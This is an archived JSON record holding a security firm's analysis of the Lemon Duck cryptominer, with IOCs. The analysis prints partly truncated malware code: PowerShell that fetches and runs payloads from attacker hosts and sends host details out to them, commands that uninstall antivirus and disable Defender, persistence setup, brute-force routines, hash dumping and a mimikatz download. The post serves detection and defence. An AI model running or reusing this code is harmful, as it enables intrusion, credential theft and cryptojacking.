{
	"id": "47dc7f72-c375-4be9-8163-ce932ff656ab",
	"created_at": "2026-04-06T00:12:47.581031Z",
	"updated_at": "2026-04-10T03:21:01.378882Z",
	"deleted_at": null,
	"sha1_hash": "cffbc669832310936a59f0efb5ef74f4cfc16a5e",
	"title": "Lemon-Duck Cryptominer Technical Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126807,
	"plain_text": "Lemon-Duck Cryptominer Technical Analysis\r\nBy Anonymous\r\nPublished: 2021-06-01 · Archived: 2026-04-05 13:39:20 UTC\r\nThis blog post was authored by Fareed.\r\nSummary\r\nLemon Duck is a crypto-mining malware that targets infected computer resources to mine Monero cryptocurrency.\r\nThis malware has a lot of capabilities and runs its payload mostly in memory which makes its presence stealthy in\r\ninfected machines. The fileless infection of the malware is mainly using PowerShell modules. Phishing emails\r\nwith a malicious document, SMB Remote Code Execution Vulnerability (CVE-2017-0144), and brute-force\r\nattacks were used to conduct internal network spreading while a malicious document was used to infect external\r\nvictims. They also leverage some open source tools like XMRig, PingCastle, PowerSploit to achieve their goals.\r\nInitial access\r\nThe infection of this crypto miner begin on the victim in many ways.\r\nPhishing email with Malicious document as an attachment\r\nSMB exploit\r\nRDP brute-force\r\nUSB infection\r\nSSH brute-force\r\nPass the hash\r\nMS-SQL brute-force\r\nRedis remote command\r\nYarn remote command\r\nOur Splunk detection team first detect a lot of suspicious communication were made to a domain name\r\nt[.]bb3u9[.]com as shown in below:\r\nhttp://t.bb3u9.com/report.jsp?\u0026redacted\u0026redacted\u0026redacted\u00267%20Professional%20_6.1.7600\u00261\u0026redacted$redacted\u0026H_R\u0026\r\nOur threat analyst team investigate the URL and realized that the URL is appended a lot of computer information\r\ninclude Windows version, hostname, and many more, which in our case, the infected victim information.\r\nUsing VTGraph from VirusTotal, the domain was flagged as malicious by various security vendors. The domain\r\nalso has communicated with a lot of malicious files which confirmed that the domain is malicious.\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 1 of 15\n\nFigure 1: VTGraph result of domain t[.]bb3u9[.]com\r\nTracking and hunting down the domain and few indicators of initial access in Splunk, we found that the malware\r\nwas spread through Pass the hash method.\r\nWhich execution made the above request?\r\nAfter conducting a malware analysis on the sample, we observed that the above-mentioned request was made after\r\nthe execution of a persistence mechanism PowerShell from Scheduler Task. The below figure shows scheduler\r\ntask was created by the malware.\r\nFigure 2: Lemon Duck's scheduler task in our Windows VM analysis\r\nThe format version of the Powershell code as below:\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 2 of 15\n\nfunction a($u){\r\n $d=(Ne`w-Obj`ect Net.WebC`lient).DownloadData($u);\r\n $c=$d.count;\r\n if($c -gt 173){\r\n $b=$d[173..$c];\r\n $p=New-Object Security.Cryptography.RSAParameters;\r\n $p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K\r\n $p.Exponent=0x01,0x00,0x01;\r\n $r=New-Object Security.Cryptography.RSACryptoServiceProvider;\r\n $r.ImportParameters($p);\r\n if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64St\r\n I`ex(-join[char[]]$b)\r\n }}}\r\n$url='http://'+'t.bb3'+'u9.com';\r\na($url+'/a.jsp?rep_20210521?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUI\r\nThe above code will execute the final line of the code which will retrieve the content of a.jsp and invoke the\r\ncontent of a.jsp.\r\nFirst stager\r\nBut, one question that comes across in our mind is how the scheduler task was created?\r\nOur analyst then tracks the malware behavior based on the malware sample analysis and found out that the first\r\nstager PowerShell script from the malware does these scheduler task creation things.\r\nThe following snippet decoded version of PowerShell code shows the full line of scheduler task payload is stored\r\nin variable $tmps.\r\n$tmps='function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).\"DownloadData\"($u);$c=$d.count;if($c -gt 173){$b=$d[173\r\n\u003c--snippet--\u003e\r\nif($sa){\r\nschtasks /create /ru system /sc MINUTE /mo 60 /tn \"$tnf\\$tn\" /F /tr \"powershell -w hidden -c PS_CMD\"\r\n} else {\r\nschtasks /create /sc MINUTE /mo 60 /tn \"$tnf\\$tn\" /F /tr \"powershell -w hidden -c PS_CMD\"\r\n}\r\n\u003c--snippet--\u003e\r\ntry{\r\nif($action.Arguments.Contains(\"PS_CMD\")){\r\n$folder.RegisterTask($task.Name, $task.Xml.replace(\"PS_CMD\",$tmps.replace('U1',$u.substring(0,5)).replace('U2',$\r\n}\r\nThe stager also drops WMI persistent mechanism.\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 3 of 15\n\nSet-WmiInstance -Class __EventFilter -NameSpace \"root\\subscription\" -Arguments @{Name=\"blackball1\";EventNameSpa\r\nforeach($u in $us){\r\n$theName=getRan\r\n$wmicmd=$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5)).replace('a.jsp','aa.jsp')\r\nSet-WmiInstance -Class __FilterToConsumerBinding -Namespace \"root\\subscription\" -Arguments @{Filter=(Set-WmiInst\r\nOther things to highlight for the first stager are few interesting functions like for example, Uninstall AV, Verify the\r\ncurrent hostname has been infected or not, and deny access on ports 445 and 135.\r\nThe below snippet code shows the malware that uses the WMIC utility program to perform uninstallation of Anti\r\nVirus includes Eset, Avast, and many more.\r\ncmd.exe /c start /b wmic.exe product where \"name like '%Eset%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%%Kaspersky%%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%avast%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%avp%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%Security%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%AntiVirus%'\" call uninstall /nointeractive\r\ncmd.exe /c start /b wmic.exe product where \"name like '%Norton Security%'\" call uninstall /nointeractive\r\ncmd.exe /c \"C:\\Progra~1\\Malwarebytes\\Anti-Malware\\unins000.exe\" /verysilent /suppressmsgboxes /norestart\r\ncmd.exe /c rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference\r\ncmd.exe /c rem To also disable Windows Defender Security Center include this\r\ncmd.exe /c rem cmd.exe /c reg add \"HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\" /v \"Start\" /t R\r\ncmd.exe /c rem 1 - Disable Real-time protection\r\ncmd.exe /c reg delete \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /f\r\ncmd.exe /c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"\r\ncmd.exe /c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\"\r\ncmd.exe /c reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d\r\nThe PowerShell code then will prepare a network environment such as deny access on ports 445 and 135 so that\r\nother malware can exploit SMB with the Eternal Blue exploit.\r\ncmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd\r\nnetsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53\r\nnetsh advfirewall firewall add rule name=\"deny445\" dir=in protocol=tcp localport=445 action=block\r\nnetsh advfirewall firewall add rule name=\"deny135\" dir=in protocol=tcp localport=135 action=block\r\nSo, after the first stager is executed, it will set up the environment for the malware such as removing AV, deny\r\naccess on port SMB and drop the persistent mechanism. Once the persistent PowerShell payload is executed, the\r\nmalware then will retrieve and invoke the PowerShell command in the JSP file a.jsp.\r\nDeobfuscating a.jsp\r\nThe content of a.jsp again was multi-encoded by the malware author.\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 4 of 15\n\nI`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$(\r\n\u003c--snippet--\u003e\r\n6f5334f6bbfdfebfe4ce271fa5bfdb56dafc64fa71f5ac21564f3fbef3d1cf8cd3adad0bfae85b8ba7f5b73ebe337e71bc38fdde3d20b7f7\r\nUsing PowerShell ISE, we then decode the above-encoded code to analyze the clean version of the payload just\r\nlike we did with the first stager. The deobfuscation progress is shown from figure 3 to 6:\r\nFigure 3: First version of decoded payload\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 5 of 15\n\nFigure 4: Second version of decoded payload\r\nFigure 5: Third version of decoded payload\r\nFigure 6: Final and clean version of decoded payload\r\nAfter deobfuscation, the script becomes readable. We gonna highlight only important codes of the payload.\r\nCollect information about the infected environment and store each of the values in variables.\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 6 of 15\n\n$down_url = \"http://d.u78wjdu.com\"\r\nif(!$url){$url=\"http://t.bb3u9.com\"}\r\n$core_url = $url.split(\"/\")[0..2]-join\"/\"\r\n$permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Se\r\n$comp_name = $env:COMPUTERNAME\r\n$guid = (get-wmiobject Win32_ComputerSystemProduct).UUID\r\n$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-ob\r\n$osb = (Get-WmiObject -class Win32_OperatingSystem)\r\n$os = $osb.Caption.replace(\"Microsoft Windows \",\"\")+\"_\"+$osb.Version\r\n$user = $env:USERNAME\r\n$domain = (Get-WmiObject win32_computersystem).Domain\r\n$uptime = [timespan]::FromMilliseconds([environment]::TickCount)|foreach{$_.totalseconds}\r\n$card = (Get-WmiObject Win32_VideoController).name\r\n$cpu_per = \"$((Get-WmiObject -Class Win32_Processor).LoadPercentage)\"\r\ngwmi Win32_PhysicalMemory | %{$msum = 0} { $msum += $_.Capacity };$mem=$msum/1Gb\r\nThe malware download and runs various payloads called m6.bin, m6g.bin, kr.bin, if.bin, and nvd.zip into the disk.\r\nfunction stp($gra){\r\n write-host $gra\r\nStart-Process -FilePath cmd.exe -ArgumentList \"/c $gra\"\r\n}\r\nfunction gcf($code,$md,$fn){\r\n('echo '+$code+';$ifmd5='''+$md+''';$ifp=$env:tmp+''\\'+$fn+''';$down_url='''+$down_url+''';function gmd\r\n}\r\nfunction gpa($fnam,$name){\r\n('for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin\r\n}\r\nfunction gpb($name){\r\n 'I`EX(-join[char[]]$con)|'+$name+' -'\r\n}\r\nfunction gcode($fl) {\r\n'try{$local'+$fl+'=$flase;New-Object Threading.Mutex($true,''Global\\eLocal'+$fl+''',[ref]$local'+$fl+')\r\n}\r\n$code1=gcode \"If\"\r\nI`Ex $code1\r\nif($localIf){\r\nstp ((gcf $code1 $ifmd5 $ifbin)+(gpb $rename))\r\n}\r\nif($is64){\r\n$code2=gcode \"TMn\"\r\nI`Ex $code2\r\nif($localTMn){\r\nstp ((gcf $code2 $mmd5 $mbin)+(gpa $mbin $rename))\r\n}}\r\nif(($isn -or $isa) -and $is64){\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 7 of 15\n\n$code3=gcode \"TMng\"\r\nI`Ex $code3\r\nif($localTMng){\r\nstp ((gcf $code3 $mgmd5 $mgbin)+(gpa $mgbin $rename))\r\n}}\r\n$code4=gcode \"Kr\"\r\nI`Ex $code4\r\nif($localKr){\r\nstp ((gcf $code4 $krmd5 $krbin)+(gpb $rename))\r\n}\r\nFunction SIEX act as communication for CnC function code. When communicating with the attacker, the script\r\nsends a long URL containing all the information gathered about the environment, uniquely identifying the infected\r\nmachine.\r\nfunction SIEX {\r\nParam(\r\n[string]$url\r\n)\r\ntry{\r\n$webclient = Ne`w-Obj`ect Net.WebC`lient\r\n$finalurl = \"$url\"+\"?\"+\"$params\"\r\ntry{\r\n$webclient.Headers.add(\"User-Agent\",\"Lemon-Duck-\"+$Lemon_Duck.replace('\\','-'))\r\n} catch{}\r\n$res_bytes = $webclient.DownloadData($finalurl)\r\nif($res_bytes.count -gt 173){\r\n$sign_bytes = $res_bytes[0..171];\r\n$raw_bytes = $res_bytes[173..$res_bytes.count];\r\n$rsaParams = New-Object System.Security.Cryptography.RSAParameters\r\n$rsaParams.Modulus = 0xda,0x65,0xa8,0xd7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82\r\n$rsaParams.Exponent = 0x01,0x00,0x01\r\n$rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider;\r\n$rsa.ImportParameters($rsaParams)\r\n$base64 = -join([char[]]$sign_bytes)\r\n$byteArray = [convert]::FromBase64String($base64)\r\n$sha1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider\r\nif($rsa.verifyData($raw_bytes,$sha1,$byteArray)) {\r\nIEX (-join[char[]]$raw_bytes)\r\n}}\r\n} catch{}}\r\nStart-Sleep -Seconds 3\r\nSIEX \"$core_url/report.jsp\"\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 8 of 15\n\nAll downloaded payload were downloaded in the temp folder, which we can see on the figure below:\r\nFigure 7: payloads downloaded in temp folder\r\nAnalyzing if.bin\r\nIf.bin also has been obfuscated by the author.\r\nFigure 8: Obfuscated script\r\nWe did the deobfuscation process and the script will be readable as shown in the figure below:\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 9 of 15\n\nFigure 9: Deobfuscated script\r\nFew important capabilities of the malicious files will explain below.\r\nFirst, the code containing PingCastle module which being use for port scanning to detect machines the respond on\r\nport 445. Thus, this will then launch SMB exploit on that scanned port. Snippet code as below:\r\nnamespace PingCastle.Scanners\r\n{\r\npublic class m17sc\r\n{\r\nstatic public bool Scan(string computer)\r\n{\r\nTcpClient client = new TcpClient();\r\nclient.Connect(computer, 445);\r\ntry\r\n{\r\nNetworkStream stream = client.GetStream();\r\nbyte[] negotiatemessage = GetNegotiateMessage();\r\nstream.Write(negotiatemessage, 0, negotiatemessage.Length);\r\nstream.Flush();\r\nbyte[] response = ReadSmbResponse(stream);\r\nif (!(response[8] == 0x72 \u0026\u0026 response[9] == 00)){\r\nthrow new InvalidOperationException(\"invalid negotiate response\");}\r\nbyte[] sessionSetup = GetR(response);\r\n\u003c-- snippet --\u003e\r\nRDP brute-forcing module is included to perform RDP brute force capability.\r\nnamespace RDP\r\n{\r\n public class BRUTE\r\n {\r\nprivate int flag1=-1;\r\nprivate bool check_login;\r\nprivate Process process;\r\npublic void exit(){\r\nif(!process.HasExited){\r\nprocess.Kill();};\r\nprocess.Close();}\r\n public int check(string exePath, string ip, string user, string pass, bool checklogin){\r\ntry{\r\ncheck_login = checklogin;\r\nprocess = new System.Diagnostics.Process();\r\nprocess.StartInfo.FileName = exePath;\r\nif(checklogin){\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 10 of 15\n\nprocess.StartInfo.Arguments = \"/u:\"+user+\" /p:\"+pass+\" /cert-ignore\r\n} else {\r\nprocess.StartInfo.Arguments = \"/u:\"+user+\" /p:\"+pass+\" /cert-ignore\r\nprocess.StartInfo.UseShellExecute = false;\r\nprocess.StartInfo.CreateNoWindow = true;\r\nprocess.StartInfo.RedirectStandardOutput = true;\r\nprocess.Start();\r\nprocess.BeginOutputReadLine();\r\nprocess.OutputDataReceived += new DataReceivedEventHandler(processOutputData\r\n System.Threading.Timer timer = new System.Threading.Timer(autoQuite, null, 10000, 5000);\r\n\u003c-- snippet --\u003e\r\nAnother infection method is via network drives and removable drives. It will create a .lnk file on these detected\r\ndrives and execute the payload in the shortcut lnk.\r\npublic class USBLNK\r\n {\r\n public static List blacklist = new List();\r\npublic static string gb3;\r\npublic static string gb6;\r\npublic static string jsdata;\r\n const string home = \"UTFsync\";\r\n const string inf_data = \"\\\\inf_data\"\r\n\u003c-- snippet --\u003e\r\nstatic bool IsSupported(DriveInfo drive) { return drive.IsReady \u0026\u0026 drive.AvailableFreeSpace \u003e\r\nstatic bool CheckBlacklist(string name) { return name==home || name==\"System Volume Informatio\r\nstatic bool Infect(string drive)\r\n {\r\n if (blacklist.Contains(drive)) {return true;}\r\nCreateLnk(drive, \"blue3.bin\", gb3);\r\nCreateLnk(drive, \"blue6.bin\", gb6);\r\nCreateJs(drive, \"readme.js\", jsdata);\r\n try{\r\n File.Create(drive + home + inf_data);\r\n return true;};\r\nPowerdump module being used to dumps hashes from the local system\r\n#######################################powerdump written by David Kennedy######################################\r\n$antpassword = [Text.Encoding]::ASCII.GetBytes(\"NTPASSWORD0\");\r\n$almpassword = [Text.Encoding]::ASCII.GetBytes(\"LMPASSWORD0\");\r\n$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);\r\n$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);\r\n$odd_parity = @(\r\n 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,\r\n 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 11 of 15\n\n32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,\r\n 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,\r\n 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,\r\n 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,\r\n 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,\r\n 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,\r\n \u003c-- snippet --\u003e\r\nThe script trying to get mimi.dat file which contain mimikatz payload.\r\n$mimipath = $env:tmp+'\\mimi.dat'\r\n$d_retry=3\r\nwhile(!(Test-Path $mimipath) -or (Get-Item $mimipath).length -ne 3563487){\r\nif($d_retry -eq 0){break}\r\nwrite-host \"try to get mimi...\"\r\ntry{(new-object System.Net.WebClient).DownloadFile($down_url+\"/mimi.dat?v=$VVERSION\u0026r=$d_retry\",$mimipa\r\n$d_retry--\r\nstart-sleep 3\r\n}\r\n\u003c-- snippet --\u003e\r\nAnother capability to highlight is MS-SQL brute-forcing code. It will attempt to brute force MS-SQL to gain\r\naccess.\r\nwrite-host \"start mssql port open scanning...\"\r\n$ms_portopen = localscan -port 1433 -addresses $ipaddresses[$i..($i+$tcount-1)]\r\n$old_portopen = localscan -port 65529 -addresses $ms_portopen[1]\r\nforeach($currip in $ms_portopen[1]) {\r\nif (($old_portopen[1] -notcontains $currip) -and ($currip.length -gt 6)){\r\nwrite-host \"start mssql burping...$currip\"\r\nfor($n=0; $n -lt $allpass.count; $n++){\r\n$flag=$false\r\nwrite-host(\"Try pass: \"+$allpass[$n])\r\n$flag,$banner = (mssqlrun -ip $currip -pass $allpass[$n] -cmd $mscmd_code -cmd1 $mscm\r\nif($flag) {\r\ntry{(New-Object Net.WebClient).DownloadString($down_url+'/report.json?v='+$V\r\nbreak}\r\n \u003c-- snippet --\u003e\r\nSame goes to SSH bruteforce as shown below:\r\nwrite-host \"start ssh port open scanning...\"\r\n$ssh_portopen = localscan -port 22 -addresses $ipaddresses[$i..($i+$tcount-1)]\r\n$old_portopen = localscan -port 65529 -addresses $ssh_portopen[1]\r\nforeach($currip in $ssh_portopen[1]) {\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 12 of 15\n\nif (($old_portopen[1] -notcontains $currip) -and ($currip.length -gt 6)){\r\nwrite-host \"start ssh burping...$currip\"\r\nforeach($password in $allpass){\r\nwrite-host \"Try pass:$password\"\r\n$flag1 = -1\r\n$flag1 = sshbrute $currip \"root\" $password $ssh_code\r\nif($flag1 -eq 1){\r\nwrite-host \"SUCC!!\"\r\ntry{(New-Object Net.WebClient).DownloadString($down_url+'/report.json?v='+$VVERSION+'\r\nbreak\r\n\u003c-- snippet --\u003e\r\nm6.bin\r\nm6.bin is the executable that uses for the crypto miner. From the below-executed executable, the version of\r\nXMRig is 6.3.0.\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 13 of 15\n\nFigure 10: XMRig\r\nConclusion\r\nThe malware is very stealthy as they leverage fileless execution on most of their payloads. The malware tends to\r\ninfect and spread as many systems as possible as they implement multiple methods like brute force and exploit.\r\nObserving these malware trends shows that the malware author often changes the CnC infrastructure IP address\r\nand improves their malware capabilities. Thus, makes more system as their victims.\r\nIndicator of Compromise\r\nHashes\r\nif.bin 8c4fba3df81475d075c535deae2cd373\r\nkr.bin c95f97fccb0bd80fa524cf2bfb0390a8\r\nm6.exe 4094140d07826334c345f8dc392d8fe3\r\nmimi.dat a66953b8a3eeee7d5057ddf80b8be962\r\nDNS request\r\nt.bb3u9.com\r\nt.pp6r1.com\r\np.b69kq.com\r\nd.u78wjdu.com\r\nIP connections\r\n138.68.251.24\r\n138.68.186.90\r\n88.214.207.96\r\n45.63.34.251\r\n138.68.183.180\r\n176.58.99.231\r\nExtra (Deobfucation)\r\nShout out to our internship students who managed to deobfuscate the obfuscated Powershell. Below is the links of\r\ntheir write-ups:\r\n1. (shauqi): https://nightfury99.github.io/Malware-Deobfuscate/\r\n2. (Iqbal): https://mhdiqb-malware-analysis.blogspot.com/2021/06/exploits-analysis-jsp-code-was-and-code.html\r\n3. (malik): https://almalikzakwan.github.io/Lemon-DuckAnalysis/\r\n4. ( Rosa): https://bobalattew.github.io/How-to-deobfuscate-malware-using-Powershell/\r\n5. (Taqi): https://github.com/tx-qi/mail.jsp-writeup\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 14 of 15\n\n6. (Izzat): https://github.com/Izzathajar/malware-diobfuscated/tree/gh-pages\r\n7. (Aina): https://hello-world9.github.io/fileless-attack-analysis/\r\n8. (Nadzirah): https://nadzirahmdisa.blogspot.com/2021/06/in-memory-attack-writeup.html\r\nSource: https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nhttps://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html\r\nPage 15 of 15\n\n$empty_nt $odd_parity = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0); = @(   \n1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,\n16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,\n   Page 11 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html"
	],
	"report_names": [
		"lemon-duck-cryptominer-technical.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434367,
	"ts_updated_at": 1775791261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cffbc669832310936a59f0efb5ef74f4cfc16a5e.pdf",
		"text": "https://archive.orkl.eu/cffbc669832310936a59f0efb5ef74f4cfc16a5e.txt",
		"img": "https://archive.orkl.eu/cffbc669832310936a59f0efb5ef74f4cfc16a5e.jpg"
	}
}